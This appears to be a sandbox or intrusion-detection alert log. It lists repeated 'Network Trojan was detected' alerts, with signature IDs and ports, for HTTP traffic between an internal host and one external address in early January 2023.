            Timestamp:192.168.2.3171.22.30.14749771802025381 01/05/23-08:52:31.374001
            SID:2025381
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749900802024313 01/05/23-08:53:10.997847
            SID:2024313
            Source Port:49900
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749929802024318 01/05/23-08:53:18.948979
            SID:2024318
            Source Port:49929
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750011802024318 01/05/23-08:53:42.925761
            SID:2024318
            Source Port:50011
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749869802021641 01/05/23-08:53:01.298022
            SID:2021641
            Source Port:49869
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749929802024313 01/05/23-08:53:18.948979
            SID:2024313
            Source Port:49929
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749846802024313 01/05/23-08:52:55.097334
            SID:2024313
            Source Port:49846
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749920802825766 01/05/23-08:53:16.511672
            SID:2825766
            Source Port:49920
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749736802825766 01/05/23-08:52:21.543284
            SID:2825766
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749819802825766 01/05/23-08:52:46.293306
            SID:2825766
            Source Port:49819
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749790802025381 01/05/23-08:52:38.345416
            SID:2025381
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750068802024313 01/05/23-08:53:59.646284
            SID:2024313
            Source Port:50068
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749907802021641 01/05/23-08:53:12.956728
            SID:2021641
            Source Port:49907
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499492025483 01/05/23-08:53:24.440314
            SID:2025483
            Source Port:80
            Destination Port:49949
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749702802024318 01/05/23-08:52:08.155254
            SID:2024318
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749763802024318 01/05/23-08:52:29.176849
            SID:2024318
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749815802024313 01/05/23-08:52:45.213789
            SID:2024313
            Source Port:49815
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500602025483 01/05/23-08:53:57.625551
            SID:2025483
            Source Port:80
            Destination Port:50060
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749763802024313 01/05/23-08:52:29.176849
            SID:2024313
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498122025483 01/05/23-08:52:44.499614
            SID:2025483
            Source Port:80
            Destination Port:49812
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749858802024318 01/05/23-08:52:58.341182
            SID:2024318
            Source Port:49858
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750013802025381 01/05/23-08:53:43.455950
            SID:2025381
            Source Port:50013
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750038802825766 01/05/23-08:53:51.593310
            SID:2825766
            Source Port:50038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749840802021641 01/05/23-08:52:53.465268
            SID:2021641
            Source Port:49840
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749999802024318 01/05/23-08:53:39.715844
            SID:2024318
            Source Port:49999
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749843802024318 01/05/23-08:52:54.266621
            SID:2024318
            Source Port:49843
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749843802024313 01/05/23-08:52:54.266621
            SID:2024313
            Source Port:49843
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749880802025381 01/05/23-08:53:04.232334
            SID:2025381
            Source Port:49880
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749797802025381 01/05/23-08:52:40.255110
            SID:2025381
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498942025483 01/05/23-08:53:08.094953
            SID:2025483
            Source Port:80
            Destination Port:49894
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749779802025381 01/05/23-08:52:35.235559
            SID:2025381
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749975802025381 01/05/23-08:53:33.363507
            SID:2025381
            Source Port:49975
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749791802024313 01/05/23-08:52:38.617554
            SID:2024313
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749886802024318 01/05/23-08:53:05.845633
            SID:2024318
            Source Port:49886
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750079802025381 01/05/23-08:54:02.588823
            SID:2025381
            Source Port:50079
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497632025483 01/05/23-08:52:29.259911
            SID:2025483
            Source Port:80
            Destination Port:49763
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749791802024318 01/05/23-08:52:38.617554
            SID:2024318
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749886802024313 01/05/23-08:53:05.845633
            SID:2024313
            Source Port:49886
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749903802024313 01/05/23-08:53:11.877542
            SID:2024313
            Source Port:49903
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497132025483 01/05/23-08:52:12.903010
            SID:2025483
            Source Port:80
            Destination Port:49713
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749725802024313 01/05/23-08:52:18.390674
            SID:2024313
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750060802021641 01/05/23-08:53:57.543966
            SID:2021641
            Source Port:50060
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749720802024318 01/05/23-08:52:16.949813
            SID:2024318
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749721802825766 01/05/23-08:52:17.231128
            SID:2825766
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749702802024313 01/05/23-08:52:08.155254
            SID:2024313
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749815802024318 01/05/23-08:52:45.213789
            SID:2024318
            Source Port:49815
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499772025483 01/05/23-08:53:33.981197
            SID:2025483
            Source Port:80
            Destination Port:49977
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749737802021641 01/05/23-08:52:21.818381
            SID:2021641
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749720802024313 01/05/23-08:52:16.949813
            SID:2024313
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749816802825766 01/05/23-08:52:45.483412
            SID:2825766
            Source Port:49816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498402025483 01/05/23-08:52:53.550362
            SID:2025483
            Source Port:80
            Destination Port:49840
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749885802025381 01/05/23-08:53:05.575803
            SID:2025381
            Source Port:49885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750076802825766 01/05/23-08:54:01.789357
            SID:2825766
            Source Port:50076
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750065802021641 01/05/23-08:53:58.843527
            SID:2021641
            Source Port:50065
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499932025483 01/05/23-08:53:38.222516
            SID:2025483
            Source Port:80
            Destination Port:49993
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749930802021641 01/05/23-08:53:19.220224
            SID:2021641
            Source Port:49930
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500322025483 01/05/23-08:53:50.027342
            SID:2025483
            Source Port:80
            Destination Port:50032
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750022802021641 01/05/23-08:53:46.665385
            SID:2021641
            Source Port:50022
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749795802021641 01/05/23-08:52:39.717554
            SID:2021641
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749798802021641 01/05/23-08:52:40.547899
            SID:2021641
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500102025483 01/05/23-08:53:42.733074
            SID:2025483
            Source Port:80
            Destination Port:50010
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498622025483 01/05/23-08:52:59.516920
            SID:2025483
            Source Port:80
            Destination Port:49862
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498072025483 01/05/23-08:52:43.124131
            SID:2025483
            Source Port:80
            Destination Port:49807
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749977802025381 01/05/23-08:53:33.899852
            SID:2025381
            Source Port:49977
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749725802024318 01/05/23-08:52:18.390674
            SID:2024318
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750037802024313 01/05/23-08:53:51.314352
            SID:2024313
            Source Port:50037
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749903802024318 01/05/23-08:53:11.877542
            SID:2024318
            Source Port:49903
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749881802024313 01/05/23-08:53:04.500331
            SID:2024313
            Source Port:49881
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749782802825766 01/05/23-08:52:36.098088
            SID:2825766
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749842802025381 01/05/23-08:52:54.011182
            SID:2025381
            Source Port:49842
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750037802024318 01/05/23-08:53:51.314352
            SID:2024318
            Source Port:50037
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749973802021641 01/05/23-08:53:32.829653
            SID:2021641
            Source Port:49973
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749881802024318 01/05/23-08:53:04.500331
            SID:2024318
            Source Port:49881
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749882802825766 01/05/23-08:53:04.789158
            SID:2825766
            Source Port:49882
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749998802025381 01/05/23-08:53:39.461942
            SID:2025381
            Source Port:49998
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749814802025381 01/05/23-08:52:44.953030
            SID:2025381
            Source Port:49814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499112025483 01/05/23-08:53:14.096617
            SID:2025483
            Source Port:80
            Destination Port:49911
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749831802025381 01/05/23-08:52:49.539016
            SID:2025381
            Source Port:49831
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749960802825766 01/05/23-08:53:28.475539
            SID:2825766
            Source Port:49960
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749984802021641 01/05/23-08:53:35.743967
            SID:2021641
            Source Port:49984
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749701802025381 01/05/23-08:52:07.731855
            SID:2025381
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749999802024313 01/05/23-08:53:39.715844
            SID:2024313
            Source Port:49999
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750064802025381 01/05/23-08:53:58.597698
            SID:2025381
            Source Port:50064
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749859802825766 01/05/23-08:52:58.622571
            SID:2825766
            Source Port:49859
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749935802021641 01/05/23-08:53:20.565175
            SID:2021641
            Source Port:49935
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749949802025381 01/05/23-08:53:24.361661
            SID:2025381
            Source Port:49949
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749854802825766 01/05/23-08:52:57.240558
            SID:2825766
            Source Port:49854
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750036802025381 01/05/23-08:53:51.046851
            SID:2025381
            Source Port:50036
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498292025483 01/05/23-08:52:49.086295
            SID:2025483
            Source Port:80
            Destination Port:49829
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749858802024313 01/05/23-08:52:58.341182
            SID:2024313
            Source Port:49858
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749829802021641 01/05/23-08:52:49.001962
            SID:2021641
            Source Port:49829
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749772802021641 01/05/23-08:52:31.644906
            SID:2021641
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749867802021641 01/05/23-08:53:00.773467
            SID:2021641
            Source Port:49867
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749954802025381 01/05/23-08:53:25.726692
            SID:2025381
            Source Port:49954
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749805802825766 01/05/23-08:52:42.467353
            SID:2825766
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749861802021641 01/05/23-08:52:59.149010
            SID:2021641
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749819802025381 01/05/23-08:52:46.293306
            SID:2025381
            Source Port:49819
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500002025483 01/05/23-08:53:40.075634
            SID:2025483
            Source Port:80
            Destination Port:50000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500822025483 01/05/23-08:54:03.613532
            SID:2025483
            Source Port:80
            Destination Port:50082
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498722025483 01/05/23-08:53:02.170418
            SID:2025483
            Source Port:80
            Destination Port:49872
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749776802025381 01/05/23-08:52:33.619524
            SID:2025381
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749920802025381 01/05/23-08:53:16.511672
            SID:2025381
            Source Port:49920
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497412025483 01/05/23-08:52:22.999014
            SID:2025483
            Source Port:80
            Destination Port:49741
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749895802021641 01/05/23-08:53:08.372653
            SID:2021641
            Source Port:49895
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499272025483 01/05/23-08:53:18.508316
            SID:2025483
            Source Port:80
            Destination Port:49927
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749928802825766 01/05/23-08:53:18.678448
            SID:2825766
            Source Port:49928
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749922802825766 01/05/23-08:53:17.061545
            SID:2825766
            Source Port:49922
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749952802024313 01/05/23-08:53:25.200806
            SID:2024313
            Source Port:49952
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749952802024318 01/05/23-08:53:25.200806
            SID:2024318
            Source Port:49952
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749785802825766 01/05/23-08:52:36.951784
            SID:2825766
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497852025483 01/05/23-08:52:37.034393
            SID:2025483
            Source Port:80
            Destination Port:49785
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749833802825766 01/05/23-08:52:50.090304
            SID:2825766
            Source Port:49833
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749851802825766 01/05/23-08:52:56.435777
            SID:2825766
            Source Port:49851
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749938802021641 01/05/23-08:53:21.374225
            SID:2021641
            Source Port:49938
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498282025483 01/05/23-08:52:48.817477
            SID:2025483
            Source Port:80
            Destination Port:49828
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497082025483 01/05/23-08:52:10.878854
            SID:2025483
            Source Port:80
            Destination Port:49708
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749956802021641 01/05/23-08:53:26.250117
            SID:2021641
            Source Port:49956
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499712025483 01/05/23-08:53:32.380645
            SID:2025483
            Source Port:80
            Destination Port:49971
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749749802024318 01/05/23-08:52:25.162571
            SID:2024318
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750015802025381 01/05/23-08:53:43.993137
            SID:2025381
            Source Port:50015
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750083802021641 01/05/23-08:54:03.789158
            SID:2021641
            Source Port:50083
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749746802024313 01/05/23-08:52:24.299560
            SID:2024313
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749749802024313 01/05/23-08:52:25.162571
            SID:2024313
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749832802024318 01/05/23-08:52:49.809310
            SID:2024318
            Source Port:49832
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750016802024313 01/05/23-08:53:44.267939
            SID:2024313
            Source Port:50016
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500162025483 01/05/23-08:53:44.354822
            SID:2025483
            Source Port:80
            Destination Port:50016
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750019802024313 01/05/23-08:53:45.311637
            SID:2024313
            Source Port:50019
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749924802024318 01/05/23-08:53:17.587003
            SID:2024318
            Source Port:49924
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750073802825766 01/05/23-08:54:00.951462
            SID:2825766
            Source Port:50073
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750016802024318 01/05/23-08:53:44.267939
            SID:2024318
            Source Port:50016
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749734802021641 01/05/23-08:52:20.978367
            SID:2021641
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749832802024313 01/05/23-08:52:49.809310
            SID:2024313
            Source Port:49832
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749921802024313 01/05/23-08:53:16.794242
            SID:2024313
            Source Port:49921
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750019802024318 01/05/23-08:53:45.311637
            SID:2024318
            Source Port:50019
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749921802024318 01/05/23-08:53:16.794242
            SID:2024318
            Source Port:49921
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749774802024318 01/05/23-08:52:32.369884
            SID:2024318
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749706802021641 01/05/23-08:52:09.771973
            SID:2021641
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749978802024313 01/05/23-08:53:34.155329
            SID:2024313
            Source Port:49978
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749709802021641 01/05/23-08:52:11.256691
            SID:2021641
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749774802024313 01/05/23-08:52:32.369884
            SID:2024313
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749748802025381 01/05/23-08:52:24.879047
            SID:2025381
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750018802025381 01/05/23-08:53:44.999195
            SID:2025381
            Source Port:50018
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749925802825766 01/05/23-08:53:17.874226
            SID:2825766
            Source Port:49925
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749860802024313 01/05/23-08:52:58.886735
            SID:2024313
            Source Port:49860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498782025483 01/05/23-08:53:03.786236
            SID:2025483
            Source Port:80
            Destination Port:49878
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749747802825766 01/05/23-08:52:24.577114
            SID:2825766
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749978802024318 01/05/23-08:53:34.155329
            SID:2024318
            Source Port:49978
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749860802024318 01/05/23-08:52:58.886735
            SID:2024318
            Source Port:49860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749877802825766 01/05/23-08:53:03.433942
            SID:2825766
            Source Port:49877
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749926802025381 01/05/23-08:53:18.143087
            SID:2025381
            Source Port:49926
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498562025483 01/05/23-08:52:57.873353
            SID:2025483
            Source Port:80
            Destination Port:49856
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749912802021641 01/05/23-08:53:14.329479
            SID:2021641
            Source Port:49912
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497142025483 01/05/23-08:52:13.439751
            SID:2025483
            Source Port:80
            Destination Port:49714
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500382025483 01/05/23-08:53:51.682835
            SID:2025483
            Source Port:80
            Destination Port:50038
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749788802825766 01/05/23-08:52:37.784136
            SID:2825766
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499872025483 01/05/23-08:53:36.633144
            SID:2025483
            Source Port:80
            Destination Port:49987
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749746802024318 01/05/23-08:52:24.299560
            SID:2024318
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749924802024313 01/05/23-08:53:17.587003
            SID:2024313
            Source Port:49924
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
